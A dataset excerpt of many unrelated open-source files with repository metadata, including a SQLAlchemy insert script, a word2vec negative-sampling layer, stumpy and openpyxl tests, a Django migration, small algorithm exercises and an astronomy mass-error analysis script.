"rakeshvar@gmail.com"
] | rakeshvar@gmail.com |
0ffce78daacdd1e2459e140c917feb0bfcac0095 | bd71b063f13958e07c9e16cd171d3fc0e1c58e4d | /0x0F-python-object_relational_mapping/11-model_state_insert.py | 293b9e47a1719bc9fa3f2594d981cfa01588d16b | [] | no_license | feliciahsieh/holbertonschool-higher_level_programming | 2aecd291f85fe69ab11331bb2d5372c6d67e1af6 | 017e8b87f9d8967b55ccc68ed30921572d4ddb65 | refs/heads/master | 2021-01-01T20:46:36.901665 | 2019-04-10T18:24:59 | 2019-04-10T18:24:59 | 98,931,138 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 774 | py | #!/usr/bin/python3
"""
Add the State object Louisiana to database hbtn_0e_6_usa
"""
import sys
from model_state import Base, State
from sqlalchemy import create_engine
from sqlalchemy import Column, Integer, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
if __name__ == "__main__":
    # Usage: script <mysql_username> <mysql_password> <database_name>
    Base = declarative_base()
    engine = create_engine('mysql+mysqldb://{}:{}@localhost/{}'.format(
        sys.argv[1], sys.argv[2], sys.argv[3]))
    Session = sessionmaker(bind=engine)
    session = Session()
    # Insert the new state, then query it back to print its generated id.
    newState = State(name='Louisiana')
    session.add(newState)
    session.commit()
    myState = session.query(State).filter(State.name == 'Louisiana').first()
    print("{}".format(myState.id))
    session.close()
| [
"felicia@tixwriteoff.com"
] | felicia@tixwriteoff.com |
a1df8dd1d107a12098b59d231076994ca9958a2d | 16807220b95bf9a559b97ec0de16665ff31823cb | /lcd/screens/exitscreen.py | 52556eede378c20732b65cfc92504200ed9657d1 | [
"BSD-3-Clause"
] | permissive | cuauv/software | 7263df296e01710cb414d340d8807d773c3d8e23 | 5ad4d52d603f81a7f254f365d9b0fe636d03a260 | refs/heads/master | 2021-12-22T07:54:02.002091 | 2021-11-18T01:26:12 | 2021-11-18T02:37:55 | 46,245,987 | 76 | 34 | null | 2016-08-03T05:31:00 | 2015-11-16T02:02:36 | C++ | UTF-8 | Python | false | false | 506 | py | import cairo
from screen import Screen
class ExitScreen(Screen):
def get_name(self):
return "exit"
def draw(self, cr):
cr.set_source_rgb(1.0, 0, 0)
cr.select_font_face("FreeSans", cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL)
cr.set_font_size(150)
cr.move_to(10, 150)
cr.show_text("Bye!")
cr.set_source_rgb(1.0, 1.0, 1.0)
cr.set_font_size(25)
cr.move_to(15, 230)
cr.show_text("Please wait for system halt.")
| [
"leader@cuauv.org"
] | leader@cuauv.org |
32661b4325599ee456d1c452634fb18c9f48db6e | 62a5beed83b968fb5b2082a453744bb0fe79f3f2 | /ch04/negative_sampling_layer.py | 4bef31b3c270418dcf048aabbbadfc7483bdc585 | [] | no_license | show2214/deep-learning-from-scratch-2 | 05c8515f7c00947387661a05005f2fd00cb0543b | 2deb28e68d6e0281aebf2df03c619299591d0660 | refs/heads/master | 2023-08-09T12:40:26.877054 | 2021-09-15T04:43:42 | 2021-09-15T04:43:42 | 403,802,770 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,402 | py | import sys
sys.path.append('..')
from common.np import * # import numpy as np
from common.layers import Embedding, SigmoidWithLoss
import collections
class EmbeddingDot:
def __init__(self, W):
self.embed = Embedding(W)
self.params = self.embed.params
self.grads = self.embed.grads
self.cache = None
def forward(self, h, idx):
target_W = self.embed.forward(idx)
out = np.sum(target_W * h, axis=1)
self.cache = (h, target_W)
return out
def backward(self, dout):
h, target_W = self.cache
dout = dout.reshape(dout.shape[0], 1)
dtarget_W = dout * h
self.embed.backward(dtarget_W)
dh = dout * target_W
return dh
class UnigramSampler:
def __init__(self, corpus, power, sample_size):
self.sample_size = sample_size
self.vocab_size = None
self.word_p = None
counts = collections.Counter()
for word_id in corpus:
counts[word_id] += 1
vocab_size = len(counts)
self.vocab_size = vocab_size
self.word_p = np.zeros(vocab_size)
for i in range(vocab_size):
self.word_p[i] = counts[i]
self.word_p = np.power(self.word_p, power)
self.word_p /= np.sum(self.word_p)
def get_negative_sample(self, target):
batch_size = target.shape[0]
if not GPU:
negative_sample = np.zeros((batch_size, self.sample_size), dtype=np.int32)
for i in range(batch_size):
p = self.word_p.copy()
target_idx = target[i]
p[target_idx] = 0
p /= p.sum()
negative_sample[i, :] = np.random.choice(self.vocab_size, size=self.sample_size, replace=False, p=p)
else:
negative_sample = np.random.choice(self.vocab_size, size=(batch_size, self.sample_size),
replace=True, p=self.word_p)
return negative_sample
class NegativeSamplingLoss:
def __init__(self, W, corpus, power=0.75, sample_size=5):
self.sample_size = sample_size
self.sampler = UnigramSampler(corpus, power, sample_size)
self.loss_layers = [SigmoidWithLoss() for _ in range(sample_size + 1)]
self.embed_dot_layers = [EmbeddingDot(W) for _ in range(sample_size + 1)]
self.params, self.grads = [], []
for layer in self.embed_dot_layers:
self.params += layer.params
self.grads += layer.grads
def forward(self, h, target):
batch_size = target.shape[0]
negative_sample = self.sampler.get_negative_sample(target)
score = self.embed_dot_layers[0].forward(h, target)
correct_label = np.ones(batch_size, dtype=np.int32)
loss = self.loss_layers[0].forward(score, correct_label)
negative_label = np.zeros(batch_size, dtype=np.int32)
for i in range(self.sample_size):
negative_target = negative_sample[:, i]
score = self.embed_dot_layers[1 + i].forward(h, negative_target)
loss += self.loss_layers[1 + i].forward(score, negative_label)
return loss
def backward(self, dout=1):
dh = 0
for l0, l1 in zip(self.loss_layers, self.embed_dot_layers):
dscore = l0.backward(dout)
dh += l1.backward(dscore)
return dh | [
"show2214@icloud.com"
] | show2214@icloud.com |
6cf60993a32a3c90768425762696112fcbe27ec0 | 95b8130d908c79f8192c6813fee6220ccb05c5c3 | /tests/test_stumped.py | c4744d728110eaecf1b9f334aa45e69bec1187bc | [
"BSD-3-Clause"
] | permissive | canslove/stumpy | 4ac96d44eeef24f8e2add3dd0bab0788cb117d32 | 2c1a9ace0d7241435d1e5c6578e7dca45e541108 | refs/heads/master | 2020-06-01T06:16:22.238904 | 2019-06-06T18:50:22 | 2019-06-06T18:50:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,692 | py | import numpy as np
import numpy.testing as npt
import pandas as pd
from stumpy import stumped, core
from dask.distributed import Client, LocalCluster
import pytest
import warnings
@pytest.fixture(scope="module")
def dask_client():
cluster = LocalCluster(n_workers=None, threads_per_worker=2)
client = Client(cluster)
yield client
# teardown
client.close()
cluster.close()
def naive_mass(Q, T, m, trivial_idx=None, excl_zone=0, ignore_trivial=False):
D = np.linalg.norm(
core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1
)
if ignore_trivial:
start = max(0, trivial_idx - excl_zone)
stop = min(T.shape[0] - Q.shape[0] + 1, trivial_idx + excl_zone)
D[start:stop] = np.inf
I = np.argmin(D)
P = D[I]
# Get left and right matrix profiles for self-joins
if ignore_trivial and trivial_idx > 0:
PL = np.inf
IL = -1
for i in range(trivial_idx):
if D[i] < PL:
IL = i
PL = D[i]
if start <= IL <= stop:
IL = -1
else:
IL = -1
if ignore_trivial and trivial_idx + 1 < D.shape[0]:
PR = np.inf
IR = -1
for i in range(trivial_idx + 1, D.shape[0]):
if D[i] < PR:
IR = i
PR = D[i]
if start <= IR <= stop:
IR = -1
else:
IR = -1
return P, I, IL, IR
def replace_inf(x, value=0):
x[x == np.inf] = value
x[x == -np.inf] = value
return
test_data = [
(
np.array([9, 8100, -60, 7], dtype=np.float64),
np.array([584, -11, 23, 79, 1001, 0, -19], dtype=np.float64),
),
(
np.random.uniform(-1000, 1000, [8]).astype(np.float64),
np.random.uniform(-1000, 1000, [64]).astype(np.float64),
),
]
@pytest.mark.filterwarnings("ignore:numpy.dtype size changed")
@pytest.mark.filterwarnings("ignore:numpy.ufunc size changed")
@pytest.mark.filterwarnings("ignore:numpy.ndarray size changed")
@pytest.mark.filterwarnings("ignore:\\s+Port 8787 is already in use:UserWarning")
@pytest.mark.parametrize("T_A, T_B", test_data)
def test_stumped_self_join(T_A, T_B, dask_client):
dask_client.restart()
m = 3
zone = int(np.ceil(m / 4))
left = np.array(
[
naive_mass(Q, T_B, m, i, zone, True)
for i, Q in enumerate(core.rolling_window(T_B, m))
],
dtype=object,
)
right = stumped(dask_client, T_B, m, ignore_trivial=True)
replace_inf(left)
replace_inf(right)
npt.assert_almost_equal(left, right)
dask_client.restart()
right = stumped(dask_client, pd.Series(T_B), m, ignore_trivial=True)
replace_inf(right)
npt.assert_almost_equal(left, right)
dask_client.restart()
@pytest.mark.filterwarnings("ignore:numpy.dtype size changed")
@pytest.mark.filterwarnings("ignore:numpy.ufunc size changed")
@pytest.mark.filterwarnings("ignore:numpy.ndarray size changed")
@pytest.mark.filterwarnings("ignore:\\s+Port 8787 is already in use:UserWarning")
@pytest.mark.parametrize("T_A, T_B", test_data)
def test_stumped_A_B_join(T_A, T_B, dask_client):
dask_client.restart()
m = 3
left = np.array(
[naive_mass(Q, T_A, m) for Q in core.rolling_window(T_B, m)], dtype=object
)
right = stumped(dask_client, T_A, m, T_B, ignore_trivial=False)
replace_inf(left)
replace_inf(right)
npt.assert_almost_equal(left, right)
dask_client.restart()
right = stumped(
dask_client, pd.Series(T_A), m, pd.Series(T_B), ignore_trivial=False
)
replace_inf(right)
npt.assert_almost_equal(left, right)
dask_client.restart()
| [
"seanmylaw@gmail.com"
] | seanmylaw@gmail.com |
78fb6dfd977597e0296dba31f5b7f924af76d0ee | 32997e6a8607358765254ea81d2f867269ae2b35 | /09-problems/ed_002_max_cpu_load.py | d7ce673b607b109f2ba41cecf865ebb19e7f70fa | [
"MIT"
] | permissive | aman-singh7/training.computerscience.algorithms-datastructures | 0ace578ebcec13c5293b4d4dccdaa7634788604d | a4e1d1973b091589690fd2efc5dcb3c1a4df6c4c | refs/heads/master | 2023-06-09T12:27:55.569254 | 2021-06-29T20:16:37 | 2021-06-29T20:16:37 | 401,133,325 | 1 | 0 | MIT | 2021-08-29T20:12:50 | 2021-08-29T20:12:49 | null | UTF-8 | Python | false | false | 2,706 | py | """
1. Problem Summary / Clarifications / TDD:
[[1,4,3], [2,5,4], [7,9,6]]: 7
[[6,7,10], [2,4,11], [8,12,15]]: 15
[[1,4,2], [2,4,1], [3,6,5]]: 8
Output: 8
2. Intuition:
1. Store store current end time and current load
2. Compute current load: current load + curr_job.cpu_load - all previous job cpu load which job.end < curr_job.start
3. Compute the max cpu load
3. Implementation:
4. Tests:
Edge case 1: []: 0
Edge case 2: [[0,2,3]]: 3
Edge case 3: [[0,2,3],[0,2,3]]: 6
Spacial case: [[0,20,3],[1,21,3],[2,22,3],[3,23,3]]: 12
Cases above
5: Complexity Analysis:
Time Complexity: O(nlogn) because of the sorting and heappush/heappop
Space Complexity: O(n) when max(jobs.start.values) < min(jobs.end.values)
"""
import heapq
class Solution:
def __init__(self):
self._start = 0
self._end = 1
self._cpu_load = 2
def find_max_cpu_load(self, jobs):
# 1. Sort all job by job start time
jobs.sort(key=lambda job: job[self._start])
job_end_time_heap = []
# 2. Compute cpu max load
cpu_max_load = 0
cpu_curr_load = 0
for job in jobs:
# 2.1. Deduce all previous job cpu loads
while job_end_time_heap and job[self._start] > job_end_time_heap[0][0]:
cpu_curr_load -= job_end_time_heap[0][1]
heapq.heappop(job_end_time_heap)
# 2.2. Add current job cpu load
cpu_curr_load += job[self._cpu_load]
# 2.3. Push current job cpu load
heapq.heappush(job_end_time_heap, (job[self._end], job[self._cpu_load]))
cpu_max_load = max(cpu_max_load, cpu_curr_load)
return cpu_max_load
if __name__ == '__main__':
max_cpu_load_solution = Solution()
# Edge Cases:
print('[]: ', max_cpu_load_solution.find_max_cpu_load([]))
print('[[0,2,3]]: ', max_cpu_load_solution.find_max_cpu_load([[0,2,3]]))
print('[[0,2,3],[0,2,3]]: ', max_cpu_load_solution.find_max_cpu_load([[0,2,3],[0,2,3]]))
# Spacial Cases:
print('[[0,20,3],[1,21,3],[2,22,3],[3,23,3]]: ', max_cpu_load_solution.find_max_cpu_load([[0,20,3],[1,21,3],[2,22,3],[3,23,3]]))
# Test Cases:
print('[[1,4,3],[2,5,4],[7,9,6]]: ', max_cpu_load_solution.find_max_cpu_load([[1,4,3],[2,5,4],[7,9,6]]))
print('[[6,7,10],[2,4,11],[8,12,15]]: ', max_cpu_load_solution.find_max_cpu_load([[6,7,10],[2,4,11],[8,12,15]]))
print('[[1,4,2],[2,4,1],[3,6,5]]: ', max_cpu_load_solution.find_max_cpu_load([[1,4,2],[2,4,1],[3,6,5]]))
| [
"mamid1706@hotmail.fr"
] | mamid1706@hotmail.fr |
19eeeb6f65f752d9650f12b7db8cbd7fd4e52021 | 0fac73e70eeb8e3b8635de8a4eaba1197cd42641 | /shop/migrations/0009_auto_20161218_1423.py | 6c991c55ff7db73b3fcce1e6b9e86531343964e6 | [] | no_license | gauraviit1/myshop_aws | 0e6c9d822cbbc6505eb7c7a71654d34591e7b168 | 261b296d79cfdf8fa4cb9105b4e2fe70e864f6a6 | refs/heads/master | 2021-01-19T13:44:12.977253 | 2017-03-03T07:52:58 | 2017-03-03T07:52:58 | 82,444,113 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 646 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-12-18 08:53
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shop', '0008_auto_20161218_1418'),
]
operations = [
migrations.AlterField(
model_name='productattribute',
name='size',
field=models.CharField(blank=True, max_length=2),
),
migrations.AlterField(
model_name='productattribute',
name='waist_size',
field=models.PositiveSmallIntegerField(blank=True),
),
]
| [
"mcjail.shi.hp@gmail.com"
] | mcjail.shi.hp@gmail.com |
cf7a6073c70b6641ce1642c80b71357c98691c98 | 441f0b4b4f2016ace7bed37431779b3352b9c2e4 | /YouTube Ignorancia Zero/Ferramentas de Sistema/105 - Ferramentas de Sistema I: Básico módulo sys/105.py | 00f7f36c467e269506283635dc65f9c6e2a2bbff | [] | no_license | AlexGalhardo/Learning-Python | 936b2eae814d148b0b3b77cc76cf81b45fbb4a02 | b710952101a0409f585ba975e2854bf0e0286ac7 | refs/heads/master | 2020-05-19T23:32:49.285710 | 2019-09-04T17:37:27 | 2019-09-04T17:37:27 | 134,312,273 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 424 | py |
##### Modulo sys #####
"""
platform = devolve a plataforma de execução
path = lista com todas as pastas ligadas ao programa
exit([args]) = termina a execução de um programa
modules = todos os módulos carregados
exc_info = tupla que contem a ultima excessão levantada
"""
import sys
#if 'win' in sys.platform:
# import winsound
#print(sys.modules)
#try:
# raise IndexError
#except:
# print(sys.exc_info())
| [
"aleexgvieira@gmail.com"
] | aleexgvieira@gmail.com |
85c31e40b493df1d537fa5c1d68f81571561acf1 | 6cc35793f2bac664d2ab9273911b37a256933418 | /Aula18/1.py | 8a83b57ae03116a3b36484bd55697b3268cfeffc | [] | no_license | MarcianoPazinatto/TrabalhosdePython | a6d8384b3586d5619654a70c73a978ce9def9b8a | 74ccf0541de426ad795700234643218953d7b0a0 | refs/heads/master | 2020-09-05T21:28:13.264266 | 2020-03-10T13:40:48 | 2020-03-10T13:40:48 | 220,218,856 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,749 | py | # Aula 18 - 03-11-2019
# Exercicios para lista simples
# Dada a seguinte lista, resolva os seguintes questões:
lista = [10, 20, 'amor', 'abacaxi', 80, 'Abioluz', 'Cachorro grande é de arrasar']
print('1: Usando a indexação, escreva na tela a palavra abacaxi')
print(lista[3])
##################################################################################
print('\n\n')
print('2: Usando a indexação, escreva na tela os seguintes dados: 20, amor, abacaxi')
print(lista[1:4])
##################################################################################
print('\n\n')
print('3: Usando a indexação, escreva na tela uma lista com dados de 20 até Abioluz')
print(lista[1:6])
##################################################################################
print('\n\n')
print('4: Usando a indexação, escreva na tela uma lista com os seguintes dados:'
'\nCachorro grande é de arrasar, Abioluz, 80, abacaxi, amor, 20, 10')
print(lista[::-1])
##################################################################################
print('\n\n')
print('5: Usando o f-string e a indexação escreva na tela os seguintes dados:'
'\n { abacaxi } é muito bom, sinto muito { amor } quando eu chupo { 80 }" deles.')
print(f'{ lista[3]} é muito bom, sinto muito { lista[2] } quando eu chupo { lista[4]} deles.')
##################################################################################
print('\n\n')
print('6: Usando a indexação, escreva na tela os seguintes dados:'
'\n10, amor, 80, Cachorro grande é de arrasar')
print(lista[::2])
##################################################################################
print('\n\n')
print('7: Usando o f-string e a indexação escreva na tela os seguintes dados:'
'Abioluz - abacaxi - 10 - Cachorro grande é de arrasar - 20 - 80' )
print(f'{lista[5]}-{lista[3]}-{lista[0]}-{lista[6]}-{lista[1]}-{lista[4]}')
##################################################################################
print('\n\n')
print('8: Usando o f-string e a indexação escreva na tela os seguintes dados:'
'\namor - 10 - 10 - abacaxi - Cachorro grande é de arrasar - Abioluz - 10 - 20')
print(f'{lista[2]}-{lista[0]}-{lista[0]}-{lista[3]}-{lista[6]}-{lista[5]}-{lista[0]}-{lista[1]}')
##################################################################################
print('\n\n')
print('9: Usando a indexação, escreva na tela uma lista com dados de 10 até 80')
print(lista[0:4])
##################################################################################
print('\n\n')
print('10: Usando a indexação, escreva na tela os seguintes dados:'
'\n10, abacaxi, Cachorro grande é de arrasar')
print(lista[::3]) | [
"marciano.et@hotmail.com"
] | marciano.et@hotmail.com |
3873bba1c404a7e7984c0597b55e018dc11f41f4 | 0bb8e1d97434d079d02f2645b54a4489bee91264 | /openpyxl2/drawing/tests/test_properties.py | 4823cbedbad3cc0ed424805f97df27bcf1649e43 | [
"MIT"
] | permissive | j5int/openpyxl2 | 1313dba978179161acfc005e147ed7eed34c249a | 3c82567c33d6cad5b0b26eea97da7bb39ba7f4c8 | refs/heads/master | 2020-04-05T12:50:02.977837 | 2018-11-09T11:55:31 | 2018-11-09T11:55:31 | 156,882,728 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,858 | py | from __future__ import absolute_import
# Copyright (c) 2010-2018 openpyxl
import pytest
from openpyxl2.xml.functions import fromstring, tostring
from openpyxl2.tests.helper import compare_xml
@pytest.fixture
def NonVisualDrawingProps():
from ..properties import NonVisualDrawingProps
return NonVisualDrawingProps
class TestNonVisualDrawingProps:
def test_ctor(self, NonVisualDrawingProps):
graphic = NonVisualDrawingProps(id=2, name="Chart 1")
xml = tostring(graphic.to_tree())
expected = """
<cNvPr id="2" name="Chart 1"></cNvPr>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, NonVisualDrawingProps):
src = """
<cNvPr id="3" name="Chart 2"></cNvPr>
"""
node = fromstring(src)
graphic = NonVisualDrawingProps.from_tree(node)
assert graphic == NonVisualDrawingProps(id=3, name="Chart 2")
@pytest.fixture
def NonVisualGroupDrawingShapeProps():
from ..properties import NonVisualGroupDrawingShapeProps
return NonVisualGroupDrawingShapeProps
class TestNonVisualGroupDrawingShapeProps:
def test_ctor(self, NonVisualGroupDrawingShapeProps):
props = NonVisualGroupDrawingShapeProps()
xml = tostring(props.to_tree())
expected = """
<cNvGrpSpPr />
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, NonVisualGroupDrawingShapeProps):
src = """
<cNvGrpSpPr />
"""
node = fromstring(src)
props = NonVisualGroupDrawingShapeProps.from_tree(node)
assert props == NonVisualGroupDrawingShapeProps()
@pytest.fixture
def NonVisualGroupShape():
from ..properties import NonVisualGroupShape
return NonVisualGroupShape
class TestNonVisualGroupShape:
def test_ctor(self, NonVisualGroupShape, NonVisualDrawingProps, NonVisualGroupDrawingShapeProps):
props = NonVisualGroupShape(
cNvPr=NonVisualDrawingProps(id=2208, name="Group 1"),
cNvGrpSpPr=NonVisualGroupDrawingShapeProps()
)
xml = tostring(props.to_tree())
expected = """
<nvGrpSpPr>
<cNvPr id="2208" name="Group 1" />
<cNvGrpSpPr />
</nvGrpSpPr>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, NonVisualGroupShape, NonVisualDrawingProps, NonVisualGroupDrawingShapeProps):
src = """
<nvGrpSpPr>
<cNvPr id="2208" name="Group 1" />
<cNvGrpSpPr />
</nvGrpSpPr>
"""
node = fromstring(src)
props = NonVisualGroupShape.from_tree(node)
assert props == NonVisualGroupShape(
cNvPr=NonVisualDrawingProps(id=2208, name="Group 1"),
cNvGrpSpPr=NonVisualGroupDrawingShapeProps()
)
@pytest.fixture
def GroupLocking():
from ..properties import GroupLocking
return GroupLocking
class TestGroupLocking:
def test_ctor(self, GroupLocking):
lock = GroupLocking()
xml = tostring(lock.to_tree())
expected = """
<grpSpLocks xmlns="http://schemas.openxmlformats.org/drawingml/2006/main" />
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, GroupLocking):
src = """
<grpSpLocks />
"""
node = fromstring(src)
lock = GroupLocking.from_tree(node)
assert lock == GroupLocking()
@pytest.fixture
def GroupShapeProperties():
from ..properties import GroupShapeProperties
return GroupShapeProperties
from ..geometry import Point2D, PositiveSize2D, GroupTransform2D
class TestGroupShapeProperties:
def test_ctor(self, GroupShapeProperties):
xfrm = GroupTransform2D(
off=Point2D(x=2222500, y=0),
ext=PositiveSize2D(cx=2806700, cy=825500),
chOff=Point2D(x=303, y=0),
chExt=PositiveSize2D(cx=321, cy=111),
)
props = GroupShapeProperties(bwMode="auto", xfrm=xfrm)
xml = tostring(props.to_tree())
expected = """
<grpSpPr bwMode="auto" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
<a:xfrm rot="0">
<a:off x="2222500" y="0"/>
<a:ext cx="2806700" cy="825500"/>
<a:chOff x="303" y="0"/>
<a:chExt cx="321" cy="111"/>
</a:xfrm>
</grpSpPr>
"""
diff = compare_xml(xml, expected)
assert diff is None, diff
def test_from_xml(self, GroupShapeProperties):
src = """
<grpSpPr />
"""
node = fromstring(src)
fut = GroupShapeProperties.from_tree(node)
assert fut == GroupShapeProperties()
| [
"charlie.clark@clark-consulting.eu"
] | charlie.clark@clark-consulting.eu |
3c913a3354033d6adee53f32448dc623a7fb194f | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /Es985FEDzEQ2tkM75_17.py | e8efaf329556cd3f9c55aca68288ccd6ac325fca | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py |
def caesar_cipher(txt, key):
return ''.join(chr(65+(ord(c)-65+key)%26) if c.isupper() else\
chr(97+(ord(c)-97+key)%26) if c.islower() else c for c in txt)
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
2fd9398df9b19b15aae4de2492f5fc6f7afa17cd | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_206/1478.py | 364c4fc8e1d4c920705b9f693c1fbc451d1e49f2 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 412 | py | t = int (input() )
for i in range(t):
d,n = map(int,input().split() )
horse=[]
for j in range(n):
temp1,temp2= map(int,input().split() )
horse.append([temp1,temp2])
ans=0
for j in range(n):
need = (d-horse[j][0])/horse[j][1]
if(need > ans):
ans=need
print("Case #"+str(i+1)+": "+"{:.12f}".format(d/ans) )
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
8531d5d6b9c1ce71600a47c0591f26494c47860b | e22c17c4f6b83a48a5bbe75bc35ad2132d93ebce | /opl/migrations/0008_auto_20200305_1559.py | 42b9942ce85a1c8cd5a98bd086312d86a9ec9375 | [] | no_license | MATT143/Snippets | f568b4117f2fe097ea5611e0bab764c4e13bb724 | 17a816b926a3ec5e9658739801d6bf3095b0128a | refs/heads/master | 2022-04-23T01:40:50.447026 | 2020-04-18T04:09:25 | 2020-04-18T04:09:25 | 256,666,806 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 576 | py | # Generated by Django 2.2.11 on 2020-03-05 10:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('opl', '0007_auto_20200305_1302'),
]
operations = [
migrations.AddField(
model_name='oplorderdetails',
name='subscriptionId',
field=models.CharField(default=None, max_length=20),
),
migrations.AlterField(
model_name='oplorderdetails',
name='subRefId',
field=models.CharField(max_length=20),
),
]
| [
"mnahak@cisco.com"
] | mnahak@cisco.com |
6415c261c52b6628e5b7cacc8a70924cc04f753a | 53ed8b8d650439ba9aac764f5de5d96b67cbd77a | /867. Transpose Matrix.py | b2f1e40fd1c10e63a14c2f6c0f60df89da6dad8c | [] | no_license | IrwinLai/LeetCode | df49d152b4bf439c966afa53eecfe3022fb043ae | 779c3a98d9052a12d319c0219324e5d0f5517fc6 | refs/heads/master | 2021-07-03T08:02:55.425285 | 2021-03-21T11:19:46 | 2021-03-21T11:19:46 | 221,848,796 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | class Solution:
def transpose(self, A: List[List[int]]) -> List[List[int]]:
ret = [[] for i in range(len(A[0]))]
for r in range(len(A)):
for c in range(len(A[0])):
ret[c].append(A[r][c])
return ret | [
"noreply@github.com"
] | IrwinLai.noreply@github.com |
294df0914a41007122338f4e5fa1725bdd8373de | ed257bb11c2916f8e849a753911f9cf866687774 | /code/experiment_001.py | a5b859e304fa0846047472a516150bb217036621 | [
"MIT"
] | permissive | forero/BetaSkeleton | 737000f5f0a132a0040b5184c90a803490cbcdd9 | 9714f11904bb9c990285815bd29303c08d6aafac | refs/heads/master | 2020-04-06T03:57:08.299294 | 2014-07-31T20:39:14 | 2014-07-31T20:39:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,228 | py | from subprocess import call
total_mocks = 27
base_mass = [1.0E13]
base_f_in = [1.0]
rsd_options = [1,0]
beta_values = [1,2,5,10,20,30]
min_theta=90.0
max_theta=180.0
min_phi=[0.0,89.0]
max_phi=[1.0,90.0]
min_r=0.0
max_r=2000.0
omega_m_values = [0.30]
w_values = [-1.0]
for i_mock in range(total_mocks):
for rsd in rsd_options:
for beta in beta_values:
for i_mass, i_f_in in zip(base_mass, base_f_in):
for i_min_phi, i_max_phi in zip(min_phi, max_phi):
for w in w_values:
for omega_m in omega_m_values:
command_all=\
"make -f Makefile %s MOCK_ID=%02d BETA=%d CUT_MASS=%.1E FRAC=%.4f \
RSD=%d MIN_THETA=%.1f MAX_THETA=%.1f MIN_PHI=%.1f MAX_PHI=%.1f MIN_R=%.1f MAX_R=%.1f \
OMEGA_M=%.2f OMEGA_L=%.2f W=%.1f" \
%("all", i_mock, beta, i_mass, i_f_in, rsd, min_theta, max_theta, \
i_min_phi, i_max_phi, min_r, max_r, omega_m, 1.0 - omega_m, w)
print command_all
retcode = call(command_all,shell=True)
| [
"j.e.forero.romero@gmail.com"
] | j.e.forero.romero@gmail.com |
4dde39c66097431c01d8dbfe496e121fd7f4e9b6 | a1b42a61f2f179ee0a12746d9526253ab3a407c8 | /data/boada/analysis_all/MLmethods/calc_errors_ML.py | d3e84a3acc0ac2df776c97a138a636a2b70de5ae | [
"MIT"
] | permissive | sazabi4/vpCluster | 1436c3df8d6721d67ef7dcc68c381b2bd776c45b | d0bf5e209c83b3d7781997066d61181fe60bf3af | refs/heads/master | 2021-01-16T21:27:29.776100 | 2016-04-26T20:36:21 | 2016-04-26T20:36:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,588 | py | import numpy as np
import h5py as hdf
from scipy import stats
def error(true, pred, mu):
''' Unused, but kept to see how I did it when I wasn't using the Scipy
functions. Calculates the error on the mean.
'''
print true.size,
if true.size > 1:
var = np.sum((pred - true - mu)**2) /(true.size - 1)
sem = np.sqrt(var/true.size)
return sem
elif true.size == 1:
return 0
else:
return np.nan
def bias(true, pred):
''' unused, but calculates the mean bias. '''
if true.size > 0:
return np.sum(pred - true) /true.size
#return np.median(true)
else:
return np.nan
def runningStatistic(stat, true, pred, **kwargs):
''' b = bias and s = uncertainty on that bias '''
bins = np.arange(11.5,16,0.5)
indx = np.digitize(true, bins)-1
binNumber = len(bins)
runningb = []
runnings = []
for k in xrange(binNumber):
print true[indx==k].size,
b = np.mean(pred[indx==k] - true[indx==k])
s = stats.sem(pred[indx==k] - true[indx==k])
print '$%.2f\pm{%.2f}$ &' % (b,s)
try:
mean, var, std = stats.mvsdist(pred[indx==k] - true[indx==k])
#print '$%.2f\pm{%.2f}$ &' % (std.mean(),std.std()),
except ValueError:
pass
#print '$%.2f\pm{%.2f}$ &' % (np.nan,np.nan),
runningb.append(b)
runnings.append(s)
print ''
return
### Targeted ###
################
with hdf.File('./buzzard_targetedRealistic_masses.hdf5', 'r') as f:
dset = f[f.keys()[0]]
target = dset['M200c', 'MASS', 'ML_pred_1d', 'ML_pred_2d', 'ML_pred_3d']
# filter bad values
mask = (target['ML_pred_1d'] != 0)
target = target[mask]
for d in [target]:
### Full survey ###
mean, var, std = stats.mvsdist(np.log10(d['MASS']) - np.log10(d['M200c']))
s = stats.sem(np.log10(d['MASS']) - np.log10(d['M200c']))
#print '$%.2f\pm{%.3f}$' % (mean.mean(),s)
print '$%.2f\pm{%.3f}$' % (std.mean(), std.std())
print('power law')
running = runningStatistic(bias, np.log10(d['M200c']),
np.log10(d['MASS']))
############
#### 1d ####
